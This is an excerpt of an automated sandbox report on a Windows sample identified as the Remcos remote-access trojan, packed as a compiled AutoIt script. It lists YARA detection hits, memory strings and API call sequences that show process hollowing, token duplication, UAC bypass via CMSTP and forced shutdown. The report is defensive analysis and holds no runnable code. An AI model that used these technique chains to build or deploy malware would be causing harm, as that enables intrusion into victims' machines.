                  Source: 2.2.antholite.exe.34e0000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 2.2.antholite.exe.34e0000.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 2.2.antholite.exe.34e0000.2.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 7.2.antholite.exe.3c00000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 7.2.antholite.exe.3c00000.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 7.2.antholite.exe.3c00000.2.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 2.2.antholite.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 2.2.antholite.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 2.2.antholite.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 2.2.antholite.exe.34e0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 2.2.antholite.exe.34e0000.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 2.2.antholite.exe.34e0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 00000002.00000002.4549770141.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 00000002.00000002.4549770141.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 00000002.00000002.4549770141.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 00000002.00000002.4551036697.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 00000002.00000002.4551036697.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 00000002.00000002.4551036697.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 00000007.00000002.2233641554.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 00000007.00000002.2233641554.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 00000007.00000002.2233641554.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 00000007.00000002.2232850434.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 00000007.00000002.2232850434.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 00000007.00000002.2232850434.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: Process Memory Space: antholite.exe PID: 6364, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: Process Memory Space: antholite.exe PID: 6444, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Binary is likely a compiled AutoIt script file
                  Source: Rgh99876k7e.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                  Source: Rgh99876k7e.exe, 00000000.00000003.2101223371.0000000004301000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_67d66b9e-9
                  Source: Rgh99876k7e.exe, 00000000.00000003.2101223371.0000000004301000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_0fcfa98c-a
                  Source: Rgh99876k7e.exe, 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_d9e182d9-c
                  Source: Rgh99876k7e.exe, 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_6d89a1b8-b
                  Source: antholite.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                  Source: antholite.exe, 00000002.00000002.4550042362.0000000000952000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_3971682b-8
                  Source: antholite.exe, 00000002.00000002.4550042362.0000000000952000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_706a17db-c
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: This is a third-party compiled AutoIt script.3_2_00892A32
                  Source: antholite.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                  Source: antholite.exe, 00000003.00000002.2160714628.0000000000952000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_f1b58c9b-b
                  Source: antholite.exe, 00000003.00000002.2160714628.0000000000952000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_03a45a4d-d
                  Source: antholite.exe, 00000004.00000000.2143092752.0000000000952000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_6243c1c7-a
                  Source: antholite.exe, 00000004.00000000.2143092752.0000000000952000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_e1314386-2
                  Source: antholite.exe, 00000005.00000002.2146925436.0000000000952000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_4644178f-1
                  Source: antholite.exe, 00000005.00000002.2146925436.0000000000952000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_09e3f308-c
                  Source: antholite.exe, 00000007.00000002.2233000415.0000000000952000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_55cbad4b-8
                  Source: antholite.exe, 00000007.00000002.2233000415.0000000000952000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_29ec75e4-7
                  Source: Rgh99876k7e.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_6ecdb55a-1
                  Source: Rgh99876k7e.exeString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_a8045d7e-c
                  Source: antholite.exe.0.drString found in binary or memory: This is a third-party compiled AutoIt script.memstr_826fa99c-5
                  Source: antholite.exe.0.drString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_3f8d1b51-7
                  Windows Scripting host queries suspicious COM object (likely to drop second stage)
                  Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeProcess Stats: CPU usage > 49%
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_0041812A GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,2_2_0041812A
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_0041330D OpenProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,GetFinalPathNameByHandleW,CloseHandle,CreateFileMappingW,MapViewOfFile,GetFileSize,UnmapViewOfFile,CloseHandle,CloseHandle,CloseHandle,2_2_0041330D
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_0041D620 NtdllDefWindowProc_A,GetCursorPos,SetForegroundWindow,TrackPopupMenu,IsWindowVisible,ShowWindow,ShowWindow,SetForegroundWindow,Shell_NotifyIcon,ExitProcess,CreatePopupMenu,AppendMenuA,2_2_0041D620
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_0041BBC6 OpenProcess,NtResumeProcess,CloseHandle,2_2_0041BBC6
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_0041BB9A OpenProcess,NtSuspendProcess,CloseHandle,2_2_0041BB9A
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,3_2_0040DD85
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_00401806 NtdllDefWindowProc_W,3_2_00401806
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_004018C0 NtdllDefWindowProc_W,3_2_004018C0
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeCode function: 0_2_0076D5EB: CreateFileW,DeviceIoControl,CloseHandle,0_2_0076D5EB
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeCode function: 0_2_00761201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00761201
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeCode function: 0_2_0076E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_0076E8F6
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_004167EF ExitWindowsEx,LoadLibraryA,GetProcAddress,2_2_004167EF
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_008FE8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,2_2_008FE8F6
